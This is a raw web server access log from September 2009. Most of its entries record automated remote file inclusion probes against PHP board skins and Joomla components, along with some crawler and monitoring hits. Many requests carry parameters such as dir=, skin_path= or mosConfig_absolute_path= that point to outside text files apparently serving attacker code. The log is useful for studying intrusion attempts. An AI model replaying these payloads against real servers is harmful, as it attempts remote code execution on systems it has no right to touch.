206.225.95.33 - - [12/Sep/2009:01:12:15 -0400] "GET //skin/ggambo6200_boardgallery/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:01:12:15 -0400] "GET /logs/access_log.Q109061000%20%20//skin/ggambo6200_boardgallery/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:01:12:15 -0400] "GET //skin/ggambo6200_boardgallery/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:01:12:15 -0400] "GET /logs//skin/ggambo6200_boardgallery/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:01:12:46 -0400] "GET /logs//_footer.php?skin_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:01:12:46 -0400] "GET //_footer.php?skin_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:01:12:46 -0400] "GET /logs/access_log.Q109052800%20%20//_footer.php?skin_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:01:13:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.34.163.101 - - [12/Sep/2009:01:13:31 -0400] "GET /logs/access_log.Q109081200%20%20//_footer.php?skin_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:13:38 -0400] "GET /errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:13:38 -0400] "GET /logs/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:13:38 -0400] "GET /logs/access_log.Q109081900%20%20/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:13:48 -0400] "GET /errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:13:48 -0400] "GET /logs/access_log.Q109081900%20%20/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:13:48 -0400] "GET /logs/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:13:59 -0400] "GET /logs/access_log.Q109082500%20%20/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:14:05 -0400] "GET /logs//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:14:05 -0400] "GET //template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:14:05 -0400] "GET /logs/error_log.Q109071400%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:14:06 -0400] "GET /logs/access_log.Q109082500%20%20/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:14:43 -0400] "GET /logs/access_log.Q109071400%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:15:03 -0400] "GET /logs/access_log.Q109070200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:15:28 -0400] "GET /logs/error_log.Q109082700%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:15:35 -0400] "GET /logs/error_log.Q109070600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:15:35 -0400] "GET /logs/error_log.Q109071600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.226.214.200 - - [12/Sep/2009:01:15:38 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3; yie8)"
69.226.214.200 - - [12/Sep/2009:01:15:38 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3; yie8)"
69.226.214.200 - - [12/Sep/2009:01:15:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3; yie8)"
69.226.214.200 - - [12/Sep/2009:01:15:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3; yie8)"
220.73.161.101 - - [12/Sep/2009:01:16:02 -0400] "GET /logs/error_log.Q109070200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:16:10 -0400] "GET /logs/access_log.Q109071600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:16:41 -0400] "GET /logs/access_log.Q109071200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:16:41 -0400] "GET /logs/access_log.Q109082700%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
74.6.22.167 - - [12/Sep/2009:01:18:10 -0400] "GET /logs/ HTTP/1.0" 200 17498 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [12/Sep/2009:01:18:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [12/Sep/2009:01:18:46 -0400] "GET /errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:18:46 -0400] "GET /logs/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:18:46 -0400] "GET /logs/access_log.Q109081900%20%20/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.125.66.97 - - [12/Sep/2009:01:18:53 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
190.144.44.36 - - [12/Sep/2009:01:19:15 -0400] "GET /logs/access_log.Q109082500%20%20/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:01:22:18 -0400] "GET //bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:01:22:18 -0400] "GET /logs//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:01:22:18 -0400] "GET /logs/access_log.Q109051100%20%20//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
220.181.7.129 - - [12/Sep/2009:01:23:19 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [12/Sep/2009:01:23:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.34.163.101 - - [12/Sep/2009:01:24:09 -0400] "GET /logs/access_log.Q109081700%20%20//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:01:24:10 -0400] "GET //bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:01:24:10 -0400] "GET /logs//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:01:24:10 -0400] "GET /logs/error_log.Q109090500%20%20//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:25:32 -0400] "GET /logs//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:25:32 -0400] "GET //bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:25:32 -0400] "GET /logs/access_log.Q109081000%20%20//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:25:33 -0400] "GET //bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:25:33 -0400] "GET /logs/access_log.Q109081000%20%20//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:25:33 -0400] "GET /logs//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:25:34 -0400] "GET /logs//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:25:34 -0400] "GET /logs/access_log.Q109071400%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:25:34 -0400] "GET //template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:25:46 -0400] "GET /logs/error_log.Q109090500%20%20//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:25:51 -0400] "GET /logs/error_log.Q109071600%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:25:51 -0400] "GET /logs/error_log.Q109070200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:25:55 -0400] "GET /logs/error_log.Q109090500%20%20//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
220.73.161.101 - - [12/Sep/2009:01:26:05 -0400] "GET /logs/access_log.Q109071200%20%20//template/album.php?SECURITY_FILE=http://www.otr.co.kr/bbs/data/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Sep/2009:01:27:04 -0400] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Sep/2009:01:27:04 -0400] "GET /logs/error_log.Q109081000//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Sep/2009:01:27:04 -0400] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Sep/2009:01:27:04 -0400] "GET /logs/access_log.Q109081000//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:01:27:06 -0400] "GET /logs////skin/ggambo6200_music/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:01:27:06 -0400] "GET ////skin/ggambo6200_music/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:01:27:06 -0400] "GET /logs/access_log.Q109061000%20%20////skin/ggambo6200_music/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:01:27:08 -0400] "GET /logs////skin/ggambo6200_music/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:01:27:08 -0400] "GET ////skin/ggambo6200_music/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
206.225.95.33 - - [12/Sep/2009:01:27:08 -0400] "GET /logs/access_log.Q109061000%20%20////skin/ggambo6200_music/error.php?dir=http://www.jejucasa.com/bbs//include/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:01:27:44 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:01:27:44 -0400] "GET /logs/access_log.Q109062100%20%20///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:01:27:44 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
74.6.22.167 - - [12/Sep/2009:01:27:27 -0400] "GET /logs/access_log.Q109091100 HTTP/1.0" 200 4800132 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.215.235.2 - - [12/Sep/2009:01:27:59 -0400] "GET //bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:28:00 -0400] "GET /logs//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:28:00 -0400] "GET /logs/access_log.Q109051100%20%20//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:01:28:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.215.235.2 - - [12/Sep/2009:01:28:21 -0400] "GET //bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:28:21 -0400] "GET /logs//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:01:28:21 -0400] "GET /logs/access_log.Q109051100%20%20//bbs///skin/ggambo7002_gallery/zboard.php?dir=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Sep/2009:01:28:27 -0400] "GET /logs/access_log.Q109081000%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:28:42 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:28:42 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:28:42 -0400] "GET /logs/access_log.Q109080700//include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.100.186.87 - - [12/Sep/2009:01:29:05 -0400] "GET /logs/error_log.Q109081600%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:29:11 -0400] "GET /logs/access_log.Q109062000////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:29:13 -0400] "GET /logs/access_log.Q109051700//include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:29:30 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:29:30 -0400] "GET ////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:29:30 -0400] "GET /logs////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:29:32 -0400] "GET /logs/access_log.Q109080700//include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:29:35 -0400] "GET /logs////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:29:35 -0400] "GET ////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:29:35 -0400] "GET /logs/access_log.Q109062000////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:29:36 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:01:29:38 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:01:29:38 -0400] "GET /logs/access_log.Q109062100%20%20///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Sep/2009:01:29:38 -0400] "GET /?_SERVER_DOCUMENT_ROOT=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Sep/2009:01:29:38 -0400] "GET /logs/access_log.Q109061700/?_SERVER_DOCUMENT_ROOT=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:01:29:38 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Sep/2009:01:29:38 -0400] "GET /logs/?_SERVER_DOCUMENT_ROOT=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 200 17498 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:29:51 -0400] "GET ////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:29:51 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:29:51 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:29:51 -0400] "GET /logs/access_log.Q109080700//include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:29:52 -0400] "GET /logs////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:29:55 -0400] "GET /logs/access_log.Q109062000////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:30:01 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:30:01 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:30:01 -0400] "GET /logs/access_log.Q109080700%20%20//include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:30:09 -0400] "GET /logs////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:30:09 -0400] "GET ////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:30:15 -0400] "GET ////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:30:15 -0400] "GET /logs////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:30:15 -0400] "GET /logs/access_log.Q109062000////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:30:17 -0400] "GET /logs/access_log.Q109051700//include/print_category.php?setup[use_category]=1&dir=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:30:30 -0400] "GET ////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:30:30 -0400] "GET /logs////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:30:30 -0400] "GET /logs/access_log.Q109062000%20%20////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:30:53 -0400] "GET /logs/access_log.Q109062000%20%20////administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
